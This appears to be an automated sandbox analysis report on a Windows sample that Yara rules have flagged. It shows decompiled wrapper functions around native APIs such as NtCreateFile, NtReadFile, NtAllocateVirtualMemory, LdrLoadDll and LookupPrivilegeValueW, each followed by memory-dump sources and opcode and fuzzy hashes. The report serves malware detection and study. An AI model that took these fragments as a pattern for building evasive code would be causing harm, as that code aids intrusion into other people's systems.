                                                                                    			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                    0x00419e03
                                                                                    0x00419e0f
                                                                                    0x00419e17
                                                                                    0x00419e22
                                                                                    0x00419e3d
                                                                                    0x00419e45
                                                                                    0x00419e49

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID: 2MA$2MA
                                                                                    • API String ID: 2738559852-947276439
                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                    • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                    • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419D4C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 72%
                                                                                    			E00419D4C(char* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				asm("sbb al, 0xa8");
				 *__esi =  *__esi - 0x55;
				_t15 = _a4;
				_push(__esi);
				_t3 = _t15 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                    0x00419d4c
                                                                                    0x00419d4e
                                                                                    0x00419d53
                                                                                    0x00419d59
                                                                                    0x00419d5f
                                                                                    0x00419d67
                                                                                    0x00419d89
                                                                                    0x00419d9d
                                                                                    0x00419da1

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: wKA
                                                                                    • API String ID: 823142352-3165208591
                                                                                    • Opcode ID: 3530c239a9e24336d599e0ccb8188c4c22502168239f71ee8ccab15fa22fc0ec
                                                                                    • Instruction ID: b430243b4ab3d8a707c7d8b74db2fd04f1456870bbd44678ff6999d67969bef0
                                                                                    • Opcode Fuzzy Hash: 3530c239a9e24336d599e0ccb8188c4c22502168239f71ee8ccab15fa22fc0ec
                                                                                    • Instruction Fuzzy Hash: 2F01FDB2210208AFCB08CF98CC95EEB37E9AF8C314F158649FA5C97241D630E851CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                    0x00419d5f
                                                                                    0x00419d67
                                                                                    0x00419d89
                                                                                    0x00419d9d
                                                                                    0x00419da1

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: wKA
                                                                                    • API String ID: 823142352-3165208591
                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                    • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                    • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419F2B, Relevance: 1.6, APIs: 1, Instructions: 50memorynativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: 1a8573aaa5506ace4c384d55671c25520ddc47d414ca49e3e9c67e7622af50f8
                                                                                    • Instruction ID: 003033bb21317201f302f83140cbf6fc9cdbcbfd94455c99ec0b2311b02d1654
                                                                                    • Opcode Fuzzy Hash: 1a8573aaa5506ace4c384d55671c25520ddc47d414ca49e3e9c67e7622af50f8
                                                                                    • Instruction Fuzzy Hash: 6F0116B2200209AFCB18DF89DC91DEB77ADAF88314F11854AFE1897241C634EC61CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                    • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                                                                    • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                    • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                    • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                    • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419E7A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: a54c175d4f93f08ab13f411fce2b25f9e2ad4c88420c09b2d533af88dc44dbbe
                                                                                    • Instruction ID: 3d6ba41b61f456a09c1f192cd4dfc3496775b06ba4db6b7fb1f41ff0dde78f22
                                                                                    • Opcode Fuzzy Hash: a54c175d4f93f08ab13f411fce2b25f9e2ad4c88420c09b2d533af88dc44dbbe
                                                                                    • Instruction Fuzzy Hash: 8DE0C2B5200210AFD714EFA8DC85EE77B69EF44360F21469ABA6CDB2D1C230E540C790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                    • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                    • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c61887d11b720f10791fdf9876c8feffbf34e7d7543ebf01d80d5540fbae4740
                                                                                    • Instruction ID: 831ee23c1682f032a8af1654e37081e19b7904b52a655b2666c86ae04ffcbe4f
                                                                                    • Opcode Fuzzy Hash: c61887d11b720f10791fdf9876c8feffbf34e7d7543ebf01d80d5540fbae4740
                                                                                    • Instruction Fuzzy Hash: 4A90026260100902E20171A95414616000A97D0381F91C032A1014559ECAA58992F171
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2d23b040fcd2e705c7e93d044793119803bc63ef4d9954a9428e0c3c01c77ecf
                                                                                    • Instruction ID: 6f89d361f7702750bf8b9df1e5645822cd05d1317befb679f611dd3c20f59c6a
                                                                                    • Opcode Fuzzy Hash: 2d23b040fcd2e705c7e93d044793119803bc63ef4d9954a9428e0c3c01c77ecf
                                                                                    • Instruction Fuzzy Hash: C690026224204552A645B1A954145074006A7E0381791C022A1404954C85A69856E661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 20f4f437c28a9e5905394910505ae60afd01ba65d5ea3007bfb832c19c42e70a
                                                                                    • Instruction ID: 7a152553ee9c9132bcf9b32cd17c5beba4bfc5cdc1f440f02049473b2d55d8b7
                                                                                    • Opcode Fuzzy Hash: 20f4f437c28a9e5905394910505ae60afd01ba65d5ea3007bfb832c19c42e70a
                                                                                    • Instruction Fuzzy Hash: 6A90027220100813E21161A95514707000997D0381F91C422A041455CD96D68952F161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2208f71e6aef92d4e8b0d4e26ddbfe9b88063c7f217df6ded86ba5141c375e60
                                                                                    • Instruction ID: 83b3f5f1d528d6f824c26644a7cb189bb65455ac475277ca9272150eb4e82d09
                                                                                    • Opcode Fuzzy Hash: 2208f71e6aef92d4e8b0d4e26ddbfe9b88063c7f217df6ded86ba5141c375e60
                                                                                    • Instruction Fuzzy Hash: 899002A234100842E20061A95424B060005D7E1341F51C025E1054558D8699CC52B166
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 421a7ac2a44de89fcfbc349a6f77e0d7a5cb937f191fb1c563a492a5b5adc8f2
                                                                                    • Instruction ID: 3462aa82325b6f25487a5844acc9cc17901f152332ee98d0d9f425744911656d
                                                                                    • Opcode Fuzzy Hash: 421a7ac2a44de89fcfbc349a6f77e0d7a5cb937f191fb1c563a492a5b5adc8f2
                                                                                    • Instruction Fuzzy Hash: 3D9002A220200403920571A95424616400A97E0341B51C031E1004594DC5A58891B165
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a6f0e40196d30487c59d920c484a8e48484cdc2b334dbe5b976358f0e65763b1
                                                                                    • Instruction ID: 3fd7692da924dff768d25781c9bf38eb6f28bf4e7f5be465f2b8910318e28b52
                                                                                    • Opcode Fuzzy Hash: a6f0e40196d30487c59d920c484a8e48484cdc2b334dbe5b976358f0e65763b1
                                                                                    • Instruction Fuzzy Hash: DB9002B220100802E24071A95414746000597D0341F51C021A5054558E86D98DD5B6A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a90d1303eda9e3ef1a1fe7d9bde6ff8d53ab88be14ed011694b7e77cb43f7f4e
                                                                                    • Instruction ID: ba63e21c81e6a484f23fb9970df0f7da568f7993da9995ba8dfb86b68d897c43
                                                                                    • Opcode Fuzzy Hash: a90d1303eda9e3ef1a1fe7d9bde6ff8d53ab88be14ed011694b7e77cb43f7f4e
                                                                                    • Instruction Fuzzy Hash: BD900266211004035205A5A91714507004697D5391351C031F1005554CD6A18861A161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a0b4fcb789ca73c23c3ff5932c23f3d8f3d837d10845c2427826223c5b8c8f2e
                                                                                    • Instruction ID: 32c0e46f20df40d6878674becb988c8e46be92521e37a6c5f2672946cd4b8446
                                                                                    • Opcode Fuzzy Hash: a0b4fcb789ca73c23c3ff5932c23f3d8f3d837d10845c2427826223c5b8c8f2e
                                                                                    • Instruction Fuzzy Hash: 7790027220108C02E21061A9941474A000597D0341F55C421A441465CD86D58891B161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 1da117924c4e117f3c18c3b2798317a5027fc5ea3615f7692a8bd62ffb62762a
                                                                                    • Instruction ID: 51ebff7c342d586b524f6cbbcbfb59d0eb8ddd7c8caf4965b8dbdcc658b20e95
                                                                                    • Opcode Fuzzy Hash: 1da117924c4e117f3c18c3b2798317a5027fc5ea3615f7692a8bd62ffb62762a
                                                                                    • Instruction Fuzzy Hash: 9C90027220140802E20061A9582470B000597D0342F51C021A1154559D86A58851B5B1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 17c00758b3d1adb3a606375b87e36bcb75305f236c5d8410bde241e786b88ebe
                                                                                    • Instruction ID: e27ca0cc478e0e938cb332b4a3402d7217efe5aeb8e0e713fce1a1573431efde
                                                                                    • Opcode Fuzzy Hash: 17c00758b3d1adb3a606375b87e36bcb75305f236c5d8410bde241e786b88ebe
                                                                                    • Instruction Fuzzy Hash: 6C90026260100442924071B998549064005BBE1351751C131A0988554D85D98865A6A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 61f27de83ef31b65376c60b265b66aeac25c03e2b900293c69b9304b41db7495
                                                                                    • Instruction ID: f4df31be556de2658a3de50ec2bfe787fc5af010b55026b62ece46247f608183
                                                                                    • Opcode Fuzzy Hash: 61f27de83ef31b65376c60b265b66aeac25c03e2b900293c69b9304b41db7495
                                                                                    • Instruction Fuzzy Hash: CB90026221180442E30065B95C24B07000597D0343F51C125A0144558CC9958861A561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 826c9fc601b07de9e49f0c453612feca9ec9c3a97a6ba2e5b49ada49d910cd18
                                                                                    • Instruction ID: 17e79b2e71dddcaf9902b0e3d80c7c2c1d343d8d03119473b89b913fb665f4b9
                                                                                    • Opcode Fuzzy Hash: 826c9fc601b07de9e49f0c453612feca9ec9c3a97a6ba2e5b49ada49d910cd18
                                                                                    • Instruction Fuzzy Hash: 1790027220100C02E28071A9541464A000597D1341F91C025A0015658DCA958A59B7E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f89a0bd7fae843267434623bd54b2c71c84fb484771c1894fec004c30f8c1e4f
                                                                                    • Instruction ID: fe8947a132c4364eb74eb2b45999c7a4300c9ee690526b9a42991fd28f6781b7
                                                                                    • Opcode Fuzzy Hash: f89a0bd7fae843267434623bd54b2c71c84fb484771c1894fec004c30f8c1e4f
                                                                                    • Instruction Fuzzy Hash: 5190026A21300402E28071A9641860A000597D1342F91D425A000555CCC9958869A361
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 28aceb3f32cbcf38a3fac0a02780533a399a0411b5f6f850914b2161c5bd968d
                                                                                    • Instruction ID: 3fa2dd25746b80344bcb69030eaa80a7ca66f50796607755a9ac5963d7771598
                                                                                    • Opcode Fuzzy Hash: 28aceb3f32cbcf38a3fac0a02780533a399a0411b5f6f850914b2161c5bd968d
                                                                                    • Instruction Fuzzy Hash: 7990026230100403E24071A964286064005E7E1341F51D021E0404558CD9958856A262
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8008a72402e1e00ad90917caf5f76f7940b1a9e5739181f2330b2a7d43d1adc6
                                                                                    • Instruction ID: efcbb8eb1554506b9cc118147749bd83eda00d615d10edd896e35b51a624c191
                                                                                    • Opcode Fuzzy Hash: 8008a72402e1e00ad90917caf5f76f7940b1a9e5739181f2330b2a7d43d1adc6
                                                                                    • Instruction Fuzzy Hash: CB90027220100802E20065E96418646000597E0341F51D021A5014559EC6E58891B171
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                                                    • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                                                                    • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                                                                    • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A168, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 68%
                                                                                    			E0041A168(void* __ebx, signed int __edx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20, intOrPtr _a24, char _a28) {
				signed int _v117;
				void* _t17;
				int _t20;
				void* _t38;
				intOrPtr* _t42;
				void* _t44;

				if(__eflags < 0) {
					E0041A950(_t38, _t17, _t17 + 0xc8c, 0x7b, 0, 0x46);
					_t20 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
					return _t20;
				} else {
					_v117 = _v117 | __edx;
					_t21 = _a4;
					_t6 = _t21 + 0xc88; // 0xd8c
					_t42 = _t6;
					E0041A950(_t38, _a4, _t42,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x39);
					_t7 =  &_a28; // 0x4109ee
					return  *((intOrPtr*)( *_t42))(_a8, _a12, _a16, _a20, _a24,  *_t7, __esi, _t44);
				}
			}









                                                                                    0x0041a16a
                                                                                    0x0041a1da
                                                                                    0x0041a1f0
                                                                                    0x0041a1f4
                                                                                    0x0041a16c
                                                                                    0x0041a16f
                                                                                    0x0041a173
                                                                                    0x0041a182
                                                                                    0x0041a182
                                                                                    0x0041a18a
                                                                                    0x0041a18f
                                                                                    0x0041a1b0
                                                                                    0x0041a1b0

                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID: AP
                                                                                    • API String ID: 3899507212-2793870665
                                                                                    • Opcode ID: 1949dc8bd4466128cc880238c2749d2530f912e080f3aa0fa79461fa04fd7b85
                                                                                    • Instruction ID: 5a2b02c4674ef45d313c4b904eadb9b14324b9be84dda0877cc2feaf76ee4efb
                                                                                    • Opcode Fuzzy Hash: 1949dc8bd4466128cc880238c2749d2530f912e080f3aa0fa79461fa04fd7b85
                                                                                    • Instruction Fuzzy Hash: 83018CB1200204AFDB14DF59CC81EEB77A9AF88350F11865AFA4DA7241C634E8648BB5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

